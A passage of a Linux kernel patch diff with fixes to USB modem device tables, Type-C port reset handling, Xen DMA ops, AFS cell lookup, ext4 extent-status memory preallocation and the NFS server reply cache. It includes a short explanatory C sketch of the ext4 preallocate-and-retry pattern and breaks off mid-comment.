+ 
+@@ -1546,7 +1548,8 @@ static const struct usb_device_id option_ids[] = {
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(ZTE_VENDOR_ID, 0x0165, 0xff, 0xff, 0xff) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(ZTE_VENDOR_ID, 0x0167, 0xff, 0xff, 0xff),
+ 	  .driver_info = RSVD(4) },
+-	{ USB_DEVICE_AND_INTERFACE_INFO(ZTE_VENDOR_ID, 0x0189, 0xff, 0xff, 0xff) },
++	{ USB_DEVICE_AND_INTERFACE_INFO(ZTE_VENDOR_ID, 0x0189, 0xff, 0xff, 0xff),
++	  .driver_info = RSVD(4) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(ZTE_VENDOR_ID, 0x0191, 0xff, 0xff, 0xff), /* ZTE EuFi890 */
+ 	  .driver_info = RSVD(4) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(ZTE_VENDOR_ID, 0x0196, 0xff, 0xff, 0xff) },
+@@ -2249,6 +2252,7 @@ static const struct usb_device_id option_ids[] = {
+ 	  .driver_info = RSVD(4) | RSVD(5) | RSVD(6) },
+ 	{ USB_DEVICE(0x1782, 0x4d10) },						/* Fibocom L610 (AT mode) */
+ 	{ USB_DEVICE_INTERFACE_CLASS(0x1782, 0x4d11, 0xff) },			/* Fibocom L610 (ECM/RNDIS mode) */
++	{ USB_DEVICE_AND_INTERFACE_INFO(0x2cb7, 0x0001, 0xff, 0xff, 0xff) },	/* Fibocom L716-EU (ECM/RNDIS mode) */
+ 	{ USB_DEVICE(0x2cb7, 0x0104),						/* Fibocom NL678 series */
+ 	  .driver_info = RSVD(4) | RSVD(5) },
+ 	{ USB_DEVICE_INTERFACE_CLASS(0x2cb7, 0x0105, 0xff),			/* Fibocom NL678 series */
+@@ -2271,6 +2275,7 @@ static const struct usb_device_id option_ids[] = {
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(SIERRA_VENDOR_ID, SIERRA_PRODUCT_EM9191, 0xff, 0xff, 0x40) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(SIERRA_VENDOR_ID, SIERRA_PRODUCT_EM9191, 0xff, 0, 0) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(UNISOC_VENDOR_ID, TOZED_PRODUCT_LT70C, 0xff, 0, 0) },
++	{ USB_DEVICE_AND_INTERFACE_INFO(UNISOC_VENDOR_ID, LUAT_PRODUCT_AIR720U, 0xff, 0, 0) },
+ 	{ } /* Terminating entry */
+ };
+ MODULE_DEVICE_TABLE(usb, option_ids);
+diff --git a/drivers/usb/typec/tcpm/tcpm.c b/drivers/usb/typec/tcpm/tcpm.c
+index 5e9d0c695fdb7..bf615dc8085e9 100644
+--- a/drivers/usb/typec/tcpm/tcpm.c
++++ b/drivers/usb/typec/tcpm/tcpm.c
+@@ -5426,6 +5426,15 @@ static void _tcpm_pd_hard_reset(struct tcpm_port *port)
+ 	if (port->bist_request == BDO_MODE_TESTDATA && port->tcpc->set_bist_data)
+ 		port->tcpc->set_bist_data(port->tcpc, false);
+ 
++	switch (port->state) {
++	case ERROR_RECOVERY:
++	case PORT_RESET:
++	case PORT_RESET_WAIT_OFF:
++		return;
++	default:
++		break;
++	}
++
+ 	if (port->ams != NONE_AMS)
+ 		port->ams = NONE_AMS;
+ 	if (port->hard_reset_count < PD_N_HARD_RESET_COUNT)
+diff --git a/drivers/xen/swiotlb-xen.c b/drivers/xen/swiotlb-xen.c
+index 67aa74d201627..7290f2b402e2a 100644
+--- a/drivers/xen/swiotlb-xen.c
++++ b/drivers/xen/swiotlb-xen.c
+@@ -405,4 +405,5 @@ const struct dma_map_ops xen_swiotlb_dma_ops = {
+ 	.get_sgtable = dma_common_get_sgtable,
+ 	.alloc_pages = dma_common_alloc_pages,
+ 	.free_pages = dma_common_free_pages,
++	.max_mapping_size = swiotlb_max_mapping_size,
+ };
+diff --git a/fs/afs/dynroot.c b/fs/afs/dynroot.c
+index d7d9402ff7182..91e804c70dd0a 100644
+--- a/fs/afs/dynroot.c
++++ b/fs/afs/dynroot.c
+@@ -132,8 +132,8 @@ static int afs_probe_cell_name(struct dentry *dentry)
+ 
+ 	ret = dns_query(net->net, "afsdb", name, len, "srv=1",
+ 			NULL, NULL, false);
+-	if (ret == -ENODATA)
+-		ret = -EDESTADDRREQ;
++	if (ret == -ENODATA || ret == -ENOKEY)
++		ret = -ENOENT;
+ 	return ret;
+ }
+ 
+diff --git a/fs/afs/internal.h b/fs/afs/internal.h
+index 9ba7b68375c9f..c2d70fc1698c0 100644
+--- a/fs/afs/internal.h
++++ b/fs/afs/internal.h
+@@ -552,6 +552,7 @@ struct afs_server_entry {
+ };
+ 
+ struct afs_server_list {
++	struct rcu_head		rcu;
+ 	afs_volid_t		vids[AFS_MAXTYPES]; /* Volume IDs */
+ 	refcount_t		usage;
+ 	unsigned char		nr_servers;
+diff --git a/fs/afs/server_list.c b/fs/afs/server_list.c
+index ed9056703505f..b59896b1de0af 100644
+--- a/fs/afs/server_list.c
++++ b/fs/afs/server_list.c
+@@ -17,7 +17,7 @@ void afs_put_serverlist(struct afs_net *net, struct afs_server_list *slist)
+ 		for (i = 0; i < slist->nr_servers; i++)
+ 			afs_unuse_server(net, slist->servers[i].server,
+ 					 afs_server_trace_put_slist);
+-		kfree(slist);
++		kfree_rcu(slist, rcu);
+ 	}
+ }
+ 
+diff --git a/fs/afs/super.c b/fs/afs/super.c
+index 95d713074dc81..e95fb4cb4fcd2 100644
+--- a/fs/afs/super.c
++++ b/fs/afs/super.c
+@@ -407,6 +407,8 @@ static int afs_validate_fc(struct fs_context *fc)
+ 			return PTR_ERR(volume);
+ 
+ 		ctx->volume = volume;
++		if (volume->type != AFSVL_RWVOL)
++			ctx->flock_mode = afs_flock_mode_local;
+ 	}
+ 
+ 	return 0;
+diff --git a/fs/afs/vl_rotate.c b/fs/afs/vl_rotate.c
+index 488e58490b16e..eb415ce563600 100644
+--- a/fs/afs/vl_rotate.c
++++ b/fs/afs/vl_rotate.c
+@@ -58,6 +58,12 @@ static bool afs_start_vl_iteration(struct afs_vl_cursor *vc)
+ 		}
+ 
+ 		/* Status load is ordered after lookup counter load */
++		if (cell->dns_status == DNS_LOOKUP_GOT_NOT_FOUND) {
++			pr_warn("No record of cell %s\n", cell->name);
++			vc->error = -ENOENT;
++			return false;
++		}
++
+ 		if (cell->dns_source == DNS_RECORD_UNAVAILABLE) {
+ 			vc->error = -EDESTADDRREQ;
+ 			return false;
+@@ -285,6 +291,7 @@ failed:
+  */
+ static void afs_vl_dump_edestaddrreq(const struct afs_vl_cursor *vc)
+ {
++	struct afs_cell *cell = vc->cell;
+ 	static int count;
+ 	int i;
+ 
+@@ -294,6 +301,9 @@ static void afs_vl_dump_edestaddrreq(const struct afs_vl_cursor *vc)
+ 
+ 	rcu_read_lock();
+ 	pr_notice("EDESTADDR occurred\n");
++	pr_notice("CELL: %s err=%d\n", cell->name, cell->error);
++	pr_notice("DNS: src=%u st=%u lc=%x\n",
++		  cell->dns_source, cell->dns_status, cell->dns_lookup_count);
+ 	pr_notice("VC: ut=%lx ix=%u ni=%hu fl=%hx err=%hd\n",
+ 		  vc->untried, vc->index, vc->nr_iterations, vc->flags, vc->error);
+ 
+diff --git a/fs/ext4/extents_status.c b/fs/ext4/extents_status.c
+index b57e497679ef9..470d29fb407a5 100644
+--- a/fs/ext4/extents_status.c
++++ b/fs/ext4/extents_status.c
+@@ -144,14 +144,17 @@
+ static struct kmem_cache *ext4_es_cachep;
+ static struct kmem_cache *ext4_pending_cachep;
+ 
+-static int __es_insert_extent(struct inode *inode, struct extent_status *newes);
++static int __es_insert_extent(struct inode *inode, struct extent_status *newes,
++			      struct extent_status *prealloc);
+ static int __es_remove_extent(struct inode *inode, ext4_lblk_t lblk,
+-			      ext4_lblk_t end, int *reserved);
++			      ext4_lblk_t end, int *reserved,
++			      struct extent_status *prealloc);
+ static int es_reclaim_extents(struct ext4_inode_info *ei, int *nr_to_scan);
+ static int __es_shrink(struct ext4_sb_info *sbi, int nr_to_scan,
+ 		       struct ext4_inode_info *locked_ei);
+-static void __revise_pending(struct inode *inode, ext4_lblk_t lblk,
+-			     ext4_lblk_t len);
++static int __revise_pending(struct inode *inode, ext4_lblk_t lblk,
++			    ext4_lblk_t len,
++			    struct pending_reservation **prealloc);
+ 
+ int __init ext4_init_es(void)
+ {
+@@ -448,22 +451,49 @@ static void ext4_es_list_del(struct inode *inode)
+ 	spin_unlock(&sbi->s_es_lock);
+ }
+ 
+-static struct extent_status *
+-ext4_es_alloc_extent(struct inode *inode, ext4_lblk_t lblk, ext4_lblk_t len,
+-		     ext4_fsblk_t pblk)
++static inline struct pending_reservation *__alloc_pending(bool nofail)
++{
++	if (!nofail)
++		return kmem_cache_alloc(ext4_pending_cachep, GFP_ATOMIC);
++
++	return kmem_cache_zalloc(ext4_pending_cachep, GFP_KERNEL | __GFP_NOFAIL);
++}
++
++static inline void __free_pending(struct pending_reservation *pr)
++{
++	kmem_cache_free(ext4_pending_cachep, pr);
++}
++
++/*
++ * Returns true if we cannot fail to allocate memory for this extent_status
++ * entry and cannot reclaim it until its status changes.
++ */
++static inline bool ext4_es_must_keep(struct extent_status *es)
++{
++	/* fiemap, bigalloc, and seek_data/hole need to use it. */
++	if (ext4_es_is_delayed(es))
++		return true;
++
++	return false;
++}
++
++static inline struct extent_status *__es_alloc_extent(bool nofail)
++{
++	if (!nofail)
++		return kmem_cache_alloc(ext4_es_cachep, GFP_ATOMIC);
++
++	return kmem_cache_zalloc(ext4_es_cachep, GFP_KERNEL | __GFP_NOFAIL);
++}
++
++static void ext4_es_init_extent(struct inode *inode, struct extent_status *es,
++		ext4_lblk_t lblk, ext4_lblk_t len, ext4_fsblk_t pblk)
+ {
+-	struct extent_status *es;
+-	es = kmem_cache_alloc(ext4_es_cachep, GFP_ATOMIC);
+-	if (es == NULL)
+-		return NULL;
+ 	es->es_lblk = lblk;
+ 	es->es_len = len;
+ 	es->es_pblk = pblk;
+ 
+-	/*
+-	 * We don't count delayed extent because we never try to reclaim them
+-	 */
+-	if (!ext4_es_is_delayed(es)) {
++	/* We never try to reclaim a must kept extent, so we don't count it. */
++	if (!ext4_es_must_keep(es)) {
+ 		if (!EXT4_I(inode)->i_es_shk_nr++)
+ 			ext4_es_list_add(inode);
+ 		percpu_counter_inc(&EXT4_SB(inode->i_sb)->
+@@ -472,8 +502,11 @@ ext4_es_alloc_extent(struct inode *inode, ext4_lblk_t lblk, ext4_lblk_t len,
+ 
+ 	EXT4_I(inode)->i_es_all_nr++;
+ 	percpu_counter_inc(&EXT4_SB(inode->i_sb)->s_es_stats.es_stats_all_cnt);
++}
+ 
+-	return es;
++static inline void __es_free_extent(struct extent_status *es)
++{
++	kmem_cache_free(ext4_es_cachep, es);
+ }
+ 
+ static void ext4_es_free_extent(struct inode *inode, struct extent_status *es)
+@@ -481,8 +514,8 @@ static void ext4_es_free_extent(struct inode *inode, struct extent_status *es)
+ 	EXT4_I(inode)->i_es_all_nr--;
+ 	percpu_counter_dec(&EXT4_SB(inode->i_sb)->s_es_stats.es_stats_all_cnt);
+ 
+-	/* Decrease the shrink counter when this es is not delayed */
+-	if (!ext4_es_is_delayed(es)) {
++	/* Decrease the shrink counter when we can reclaim the extent. */
++	if (!ext4_es_must_keep(es)) {
+ 		BUG_ON(EXT4_I(inode)->i_es_shk_nr == 0);
+ 		if (!--EXT4_I(inode)->i_es_shk_nr)
+ 			ext4_es_list_del(inode);
+@@ -490,7 +523,7 @@ static void ext4_es_free_extent(struct inode *inode, struct extent_status *es)
+ 					s_es_stats.es_stats_shk_cnt);
+ 	}
+ 
+-	kmem_cache_free(ext4_es_cachep, es);
++	__es_free_extent(es);
+ }
+ 
+ /*
+@@ -751,7 +784,8 @@ static inline void ext4_es_insert_extent_check(struct inode *inode,
+ }
+ #endif
+ 
+-static int __es_insert_extent(struct inode *inode, struct extent_status *newes)
++static int __es_insert_extent(struct inode *inode, struct extent_status *newes,
++			      struct extent_status *prealloc)
+ {
+ 	struct ext4_es_tree *tree = &EXT4_I(inode)->i_es_tree;
+ 	struct rb_node **p = &tree->root.rb_node;
+@@ -791,10 +825,15 @@ static int __es_insert_extent(struct inode *inode, struct extent_status *newes)
+ 		}
+ 	}
+ 
+-	es = ext4_es_alloc_extent(inode, newes->es_lblk, newes->es_len,
+-				  newes->es_pblk);
++	if (prealloc)
++		es = prealloc;
++	else
++		es = __es_alloc_extent(false);
+ 	if (!es)
+ 		return -ENOMEM;
++	ext4_es_init_extent(inode, es, newes->es_lblk, newes->es_len,
++			    newes->es_pblk);
++
+ 	rb_link_node(&es->rb_node, parent, p);
+ 	rb_insert_color(&es->rb_node, &tree->root);
+ 
+@@ -815,8 +854,12 @@ int ext4_es_insert_extent(struct inode *inode, ext4_lblk_t lblk,
+ {
+ 	struct extent_status newes;
+ 	ext4_lblk_t end = lblk + len - 1;
+-	int err = 0;
++	int err1 = 0, err2 = 0, err3 = 0;
+ 	struct ext4_sb_info *sbi = EXT4_SB(inode->i_sb);
++	struct extent_status *es1 = NULL;
++	struct extent_status *es2 = NULL;
++	struct pending_reservation *pr = NULL;
++	bool revise_pending = false;
+ 
+ 	if (EXT4_SB(inode->i_sb)->s_mount_state & EXT4_FC_REPLAY)
+ 		return 0;
+@@ -844,29 +887,57 @@ int ext4_es_insert_extent(struct inode *inode, ext4_lblk_t lblk,
+ 
+ 	ext4_es_insert_extent_check(inode, &newes);
+ 
++	revise_pending = sbi->s_cluster_ratio > 1 &&
++			 test_opt(inode->i_sb, DELALLOC) &&
++			 (status & (EXTENT_STATUS_WRITTEN |
++				    EXTENT_STATUS_UNWRITTEN));
++retry:
++	if (err1 && !es1)
++		es1 = __es_alloc_extent(true);
++	if ((err1 || err2) && !es2)
++		es2 = __es_alloc_extent(true);
++	if ((err1 || err2 || err3) && revise_pending && !pr)
++		pr = __alloc_pending(true);
+ 	write_lock(&EXT4_I(inode)->i_es_lock);
+-	err = __es_remove_extent(inode, lblk, end, NULL);
+-	if (err != 0)
++
++	err1 = __es_remove_extent(inode, lblk, end, NULL, es1);
++	if (err1 != 0)
+ 		goto error;
+-retry:
+-	err = __es_insert_extent(inode, &newes);
+-	if (err == -ENOMEM && __es_shrink(EXT4_SB(inode->i_sb),
+-					  128, EXT4_I(inode)))
+-		goto retry;
+-	if (err == -ENOMEM && !ext4_es_is_delayed(&newes))
+-		err = 0;
++	/* Free preallocated extent if it didn't get used. */
++	if (es1) {
++		if (!es1->es_len)
++			__es_free_extent(es1);
++		es1 = NULL;
++	}
+ 
+-	if (sbi->s_cluster_ratio > 1 && test_opt(inode->i_sb, DELALLOC) &&
+-	    (status & EXTENT_STATUS_WRITTEN ||
+-	     status & EXTENT_STATUS_UNWRITTEN))
+-		__revise_pending(inode, lblk, len);
++	err2 = __es_insert_extent(inode, &newes, es2);
++	if (err2 == -ENOMEM && !ext4_es_must_keep(&newes))
++		err2 = 0;
++	if (err2 != 0)
++		goto error;
++	/* Free preallocated extent if it didn't get used. */
++	if (es2) {
++		if (!es2->es_len)
++			__es_free_extent(es2);
++		es2 = NULL;
++	}
+ 
++	if (revise_pending) {
++		err3 = __revise_pending(inode, lblk, len, &pr);
++		if (err3 != 0)
++			goto error;
++		if (pr) {
++			__free_pending(pr);
++			pr = NULL;
++		}
++	}
+ error:
+ 	write_unlock(&EXT4_I(inode)->i_es_lock);
++	if (err1 || err2 || err3)
++		goto retry;
+ 
+ 	ext4_es_print_tree(inode);
+-
+-	return err;
++	return 0;
+ }
+ 
+ /*
+@@ -899,7 +970,7 @@ void ext4_es_cache_extent(struct inode *inode, ext4_lblk_t lblk,
+ 
+ 	es = __es_tree_search(&EXT4_I(inode)->i_es_tree.root, lblk);
+ 	if (!es || es->es_lblk > end)
+-		__es_insert_extent(inode, &newes);
++		__es_insert_extent(inode, &newes, NULL);
+ 	write_unlock(&EXT4_I(inode)->i_es_lock);
+ }
+ 
+@@ -1270,7 +1341,7 @@ static unsigned int get_rsvd(struct inode *inode, ext4_lblk_t end,
+ 				rc->ndelonly--;
+ 				node = rb_next(&pr->rb_node);
+ 				rb_erase(&pr->rb_node, &tree->root);
+-				kmem_cache_free(ext4_pending_cachep, pr);
++				__free_pending(pr);
+ 				if (!node)
+ 					break;
+ 				pr = rb_entry(node, struct pending_reservation,
+@@ -1289,6 +1360,7 @@ static unsigned int get_rsvd(struct inode *inode, ext4_lblk_t end,
+  * @lblk - first block in range
+  * @end - last block in range
+  * @reserved - number of cluster reservations released
++ * @prealloc - pre-allocated es to avoid memory allocation failures
+  *
+  * If @reserved is not NULL and delayed allocation is enabled, counts
+  * block/cluster reservations freed by removing range and if bigalloc
+@@ -1296,7 +1368,8 @@ static unsigned int get_rsvd(struct inode *inode, ext4_lblk_t end,
+  * error code on failure.
+  */
+ static int __es_remove_extent(struct inode *inode, ext4_lblk_t lblk,
+-			      ext4_lblk_t end, int *reserved)
++			      ext4_lblk_t end, int *reserved,
++			      struct extent_status *prealloc)
+ {
+ 	struct ext4_es_tree *tree = &EXT4_I(inode)->i_es_tree;
+ 	struct rb_node *node;
+@@ -1304,14 +1377,12 @@ static int __es_remove_extent(struct inode *inode, ext4_lblk_t lblk,
+ 	struct extent_status orig_es;
+ 	ext4_lblk_t len1, len2;
+ 	ext4_fsblk_t block;
+-	int err;
++	int err = 0;
+ 	bool count_reserved = true;
+ 	struct rsvd_count rc;
+ 
+ 	if (reserved == NULL || !test_opt(inode->i_sb, DELALLOC))
+ 		count_reserved = false;
+-retry:
+-	err = 0;
+ 
+ 	es = __es_tree_search(&tree->root, lblk);
+ 	if (!es)
+@@ -1345,14 +1416,13 @@ retry:
+ 					orig_es.es_len - len2;
+ 			ext4_es_store_pblock_status(&newes, block,
+ 						    ext4_es_status(&orig_es));
+-			err = __es_insert_extent(inode, &newes);
++			err = __es_insert_extent(inode, &newes, prealloc);
+ 			if (err) {
++				if (!ext4_es_must_keep(&newes))
++					return 0;
++
+ 				es->es_lblk = orig_es.es_lblk;
+ 				es->es_len = orig_es.es_len;
+-				if ((err == -ENOMEM) &&
+-				    __es_shrink(EXT4_SB(inode->i_sb),
+-							128, EXT4_I(inode)))
+-					goto retry;
+ 				goto out;
+ 			}
+ 		} else {
+@@ -1432,6 +1502,7 @@ int ext4_es_remove_extent(struct inode *inode, ext4_lblk_t lblk,
+ 	ext4_lblk_t end;
+ 	int err = 0;
+ 	int reserved = 0;
++	struct extent_status *es = NULL;
+ 
+ 	if (EXT4_SB(inode->i_sb)->s_mount_state & EXT4_FC_REPLAY)
+ 		return 0;
+@@ -1446,17 +1517,29 @@ int ext4_es_remove_extent(struct inode *inode, ext4_lblk_t lblk,
+ 	end = lblk + len - 1;
+ 	BUG_ON(end < lblk);
+ 
++retry:
++	if (err && !es)
++		es = __es_alloc_extent(true);
+ 	/*
+ 	 * ext4_clear_inode() depends on us taking i_es_lock unconditionally
+ 	 * so that we are sure __es_shrink() is done with the inode before it
+ 	 * is reclaimed.
+ 	 */
+ 	write_lock(&EXT4_I(inode)->i_es_lock);
+-	err = __es_remove_extent(inode, lblk, end, &reserved);
++	err = __es_remove_extent(inode, lblk, end, &reserved, es);
++	/* Free preallocated extent if it didn't get used. */
++	if (es) {
++		if (!es->es_len)
++			__es_free_extent(es);
++		es = NULL;
++	}
+ 	write_unlock(&EXT4_I(inode)->i_es_lock);
++	if (err)
++		goto retry;
++
+ 	ext4_es_print_tree(inode);
+ 	ext4_da_release_space(inode, reserved);
+-	return err;
++	return 0;
+ }
+ 
+ static int __es_shrink(struct ext4_sb_info *sbi, int nr_to_scan,
+@@ -1704,11 +1787,8 @@ static int es_do_reclaim_extents(struct ext4_inode_info *ei, ext4_lblk_t end,
+ 
+ 		(*nr_to_scan)--;
+ 		node = rb_next(&es->rb_node);
+-		/*
+-		 * We can't reclaim delayed extent from status tree because
+-		 * fiemap, bigallic, and seek_data/hole need to use it.
+-		 */
+-		if (ext4_es_is_delayed(es))
++
++		if (ext4_es_must_keep(es))
+ 			goto next;
+ 		if (ext4_es_is_referenced(es)) {
+ 			ext4_es_clear_referenced(es);
+@@ -1772,7 +1852,7 @@ void ext4_clear_inode_es(struct inode *inode)
+ 	while (node) {
+ 		es = rb_entry(node, struct extent_status, rb_node);
+ 		node = rb_next(node);
+-		if (!ext4_es_is_delayed(es)) {
++		if (!ext4_es_must_keep(es)) {
+ 			rb_erase(&es->rb_node, &tree->root);
+ 			ext4_es_free_extent(inode, es);
+ 		}
+@@ -1859,11 +1939,13 @@ static struct pending_reservation *__get_pending(struct inode *inode,
+  *
+  * @inode - file containing the cluster
+  * @lblk - logical block in the cluster to be added
++ * @prealloc - preallocated pending entry
+  *
+  * Returns 0 on successful insertion and -ENOMEM on failure.  If the
+  * pending reservation is already in the set, returns successfully.
+  */
+-static int __insert_pending(struct inode *inode, ext4_lblk_t lblk)
++static int __insert_pending(struct inode *inode, ext4_lblk_t lblk,
++			    struct pending_reservation **prealloc)
+ {
+ 	struct ext4_sb_info *sbi = EXT4_SB(inode->i_sb);
+ 	struct ext4_pending_tree *tree = &EXT4_I(inode)->i_pending_tree;
+@@ -1889,10 +1971,15 @@ static int __insert_pending(struct inode *inode, ext4_lblk_t lblk)
+ 		}
+ 	}
+ 
+-	pr = kmem_cache_alloc(ext4_pending_cachep, GFP_ATOMIC);
+-	if (pr == NULL) {
+-		ret = -ENOMEM;
+-		goto out;
++	if (likely(*prealloc == NULL)) {
++		pr = __alloc_pending(false);
++		if (!pr) {
++			ret = -ENOMEM;
++			goto out;
++		}
++	} else {
++		pr = *prealloc;
++		*prealloc = NULL;
+ 	}
+ 	pr->lclu = lclu;
+ 
+@@ -1922,7 +2009,7 @@ static void __remove_pending(struct inode *inode, ext4_lblk_t lblk)
+ 	if (pr != NULL) {
+ 		tree = &EXT4_I(inode)->i_pending_tree;
+ 		rb_erase(&pr->rb_node, &tree->root);
+-		kmem_cache_free(ext4_pending_cachep, pr);
++		__free_pending(pr);
+ 	}
+ }
+ 
+@@ -1983,7 +2070,10 @@ int ext4_es_insert_delayed_block(struct inode *inode, ext4_lblk_t lblk,
+ 				 bool allocated)
+ {
+ 	struct extent_status newes;
+-	int err = 0;
++	int err1 = 0, err2 = 0, err3 = 0;
++	struct extent_status *es1 = NULL;
++	struct extent_status *es2 = NULL;
++	struct pending_reservation *pr = NULL;
+ 
+ 	if (EXT4_SB(inode->i_sb)->s_mount_state & EXT4_FC_REPLAY)
+ 		return 0;
+@@ -1998,29 +2088,52 @@ int ext4_es_insert_delayed_block(struct inode *inode, ext4_lblk_t lblk,
+ 
+ 	ext4_es_insert_extent_check(inode, &newes);
+ 
++retry:
++	if (err1 && !es1)
++		es1 = __es_alloc_extent(true);
++	if ((err1 || err2) && !es2)
++		es2 = __es_alloc_extent(true);
++	if ((err1 || err2 || err3) && allocated && !pr)
++		pr = __alloc_pending(true);
+ 	write_lock(&EXT4_I(inode)->i_es_lock);
+ 
+-	err = __es_remove_extent(inode, lblk, lblk, NULL);
+-	if (err != 0)
+-		goto error;
+-retry:
+-	err = __es_insert_extent(inode, &newes);
+-	if (err == -ENOMEM && __es_shrink(EXT4_SB(inode->i_sb),
+-					  128, EXT4_I(inode)))
+-		goto retry;
+-	if (err != 0)
++	err1 = __es_remove_extent(inode, lblk, lblk, NULL, es1);
++	if (err1 != 0)
+ 		goto error;
++	/* Free preallocated extent if it didn't get used. */
++	if (es1) {
++		if (!es1->es_len)
++			__es_free_extent(es1);
++		es1 = NULL;
++	}
+ 
+-	if (allocated)
+-		__insert_pending(inode, lblk);
++	err2 = __es_insert_extent(inode, &newes, es2);
++	if (err2 != 0)
++		goto error;
++	/* Free preallocated extent if it didn't get used. */
++	if (es2) {
++		if (!es2->es_len)
++			__es_free_extent(es2);
++		es2 = NULL;
++	}
+ 
++	if (allocated) {
++		err3 = __insert_pending(inode, lblk, &pr);
++		if (err3 != 0)
++			goto error;
++		if (pr) {
++			__free_pending(pr);
++			pr = NULL;
++		}
++	}
+ error:
+ 	write_unlock(&EXT4_I(inode)->i_es_lock);
++	if (err1 || err2 || err3)
++		goto retry;
+ 
+ 	ext4_es_print_tree(inode);
+ 	ext4_print_pending_tree(inode);
+-
+-	return err;
++	return 0;
+ }
+ 
+ /*
+@@ -2121,21 +2234,24 @@ unsigned int ext4_es_delayed_clu(struct inode *inode, ext4_lblk_t lblk,
+  * @inode - file containing the range
+  * @lblk - logical block defining the start of range
+  * @len  - length of range in blocks
++ * @prealloc - preallocated pending entry
+  *
+  * Used after a newly allocated extent is added to the extents status tree.
+  * Requires that the extents in the range have either written or unwritten
+  * status.  Must be called while holding i_es_lock.
+  */
+-static void __revise_pending(struct inode *inode, ext4_lblk_t lblk,
+-			     ext4_lblk_t len)
++static int __revise_pending(struct inode *inode, ext4_lblk_t lblk,
++			    ext4_lblk_t len,
++			    struct pending_reservation **prealloc)
+ {
+ 	struct ext4_sb_info *sbi = EXT4_SB(inode->i_sb);
+ 	ext4_lblk_t end = lblk + len - 1;
+ 	ext4_lblk_t first, last;
+ 	bool f_del = false, l_del = false;
++	int ret = 0;
+ 
+ 	if (len == 0)
+-		return;
++		return 0;
+ 
+ 	/*
+ 	 * Two cases - block range within single cluster and block range
+@@ -2156,7 +2272,9 @@ static void __revise_pending(struct inode *inode, ext4_lblk_t lblk,
+ 			f_del = __es_scan_range(inode, &ext4_es_is_delonly,
+ 						first, lblk - 1);
+ 		if (f_del) {
+-			__insert_pending(inode, first);
++			ret = __insert_pending(inode, first, prealloc);
++			if (ret < 0)
++				goto out;
+ 		} else {
+ 			last = EXT4_LBLK_CMASK(sbi, end) +
+ 			       sbi->s_cluster_ratio - 1;
+@@ -2164,9 +2282,11 @@ static void __revise_pending(struct inode *inode, ext4_lblk_t lblk,
+ 				l_del = __es_scan_range(inode,
+ 							&ext4_es_is_delonly,
+ 							end + 1, last);
+-			if (l_del)
+-				__insert_pending(inode, last);
+-			else
++			if (l_del) {
++				ret = __insert_pending(inode, last, prealloc);
++				if (ret < 0)
++					goto out;
++			} else
+ 				__remove_pending(inode, last);
+ 		}
+ 	} else {
+@@ -2174,18 +2294,24 @@ static void __revise_pending(struct inode *inode, ext4_lblk_t lblk,
+ 		if (first != lblk)
+ 			f_del = __es_scan_range(inode, &ext4_es_is_delonly,
+ 						first, lblk - 1);
+-		if (f_del)
+-			__insert_pending(inode, first);
+-		else
++		if (f_del) {
++			ret = __insert_pending(inode, first, prealloc);
++			if (ret < 0)
++				goto out;
++		} else
+ 			__remove_pending(inode, first);
+ 
+ 		last = EXT4_LBLK_CMASK(sbi, end) + sbi->s_cluster_ratio - 1;
+ 		if (last != end)
+ 			l_del = __es_scan_range(inode, &ext4_es_is_delonly,
+ 						end + 1, last);
+-		if (l_del)
+-			__insert_pending(inode, last);
+-		else
++		if (l_del) {
++			ret = __insert_pending(inode, last, prealloc);
++			if (ret < 0)
++				goto out;
++		} else
+ 			__remove_pending(inode, last);
+ 	}
++out:
++	return ret;
+ }
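
The ext4 hunks above replace GFP_ATOMIC allocations taken under i_es_lock with a preallocate-and-retry scheme: blocking allocations happen with the lock dropped, and the locked section only consumes what was set aside, so insertion can no longer fail with ENOMEM mid-operation. A minimal userspace sketch of the pattern, with pthread locking and malloc standing in for the kernel primitives (all names here are illustrative, not ext4's):

#include <pthread.h>
#include <stdlib.h>

struct node { long key; struct node *next; };

static pthread_mutex_t tree_lock = PTHREAD_MUTEX_INITIALIZER;
static struct node *head;

/* Stand-in for a nowait (GFP_ATOMIC-style) allocation that may fail. */
static struct node *alloc_nowait(void)
{
	return malloc(sizeof(struct node));
}

static int insert(long key)
{
	struct node *prealloc = NULL;
	struct node *n;
	int err = 0;

retry:
	if (err && !prealloc) {
		/* Blocking allocation, done with the lock dropped. */
		prealloc = malloc(sizeof(*prealloc));
		if (!prealloc)
			return -1;
	}
	pthread_mutex_lock(&tree_lock);
	n = prealloc ? prealloc : alloc_nowait();
	prealloc = NULL;
	if (!n) {
		err = -1;	/* remember the failure; retry preallocated */
	} else {
		n->key = key;
		n->next = head;
		head = n;
		err = 0;
	}
	pthread_mutex_unlock(&tree_lock);
	if (err)
		goto retry;
	return 0;
}

The "free the preallocation if it went unused" steps in the patch correspond to the prealloc pointer being consumed exactly once here; ext4 additionally signals consumption through es_len so the caller knows whether to free.
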
+diff --git a/fs/nfsd/cache.h b/fs/nfsd/cache.h
+index f21259ead64bb..3c07d587ae9e9 100644
+--- a/fs/nfsd/cache.h
++++ b/fs/nfsd/cache.h
+@@ -82,7 +82,8 @@ int	nfsd_drc_slab_create(void);
+ void	nfsd_drc_slab_free(void);
+ int	nfsd_reply_cache_init(struct nfsd_net *);
+ void	nfsd_reply_cache_shutdown(struct nfsd_net *);
+-int	nfsd_cache_lookup(struct svc_rqst *);
++int	nfsd_cache_lookup(struct svc_rqst *rqstp, unsigned int start,
++			  unsigned int len);
+ void	nfsd_cache_update(struct svc_rqst *, int, __be32 *);
+ int	nfsd_reply_cache_stats_show(struct seq_file *m, void *v);
+ 
+diff --git a/fs/nfsd/nfscache.c b/fs/nfsd/nfscache.c
+index 3e64a3d50a1c5..f53335ae0ab22 100644
+--- a/fs/nfsd/nfscache.c
++++ b/fs/nfsd/nfscache.c
+@@ -311,33 +311,53 @@ nfsd_reply_cache_scan(struct shrinker *shrink, struct shrink_control *sc)
+ 
+ 	return prune_cache_entries(nn);
+ }
+-/*
+- * Walk an xdr_buf and get a CRC for at most the first RC_CSUMLEN bytes
++
++/**
++ * nfsd_cache_csum - Checksum incoming NFS Call arguments
++ * @buf: buffer containing a whole RPC Call message
++ * @start: starting byte of the NFS Call header
++ * @remaining: size of the NFS Call header, in bytes
++ *
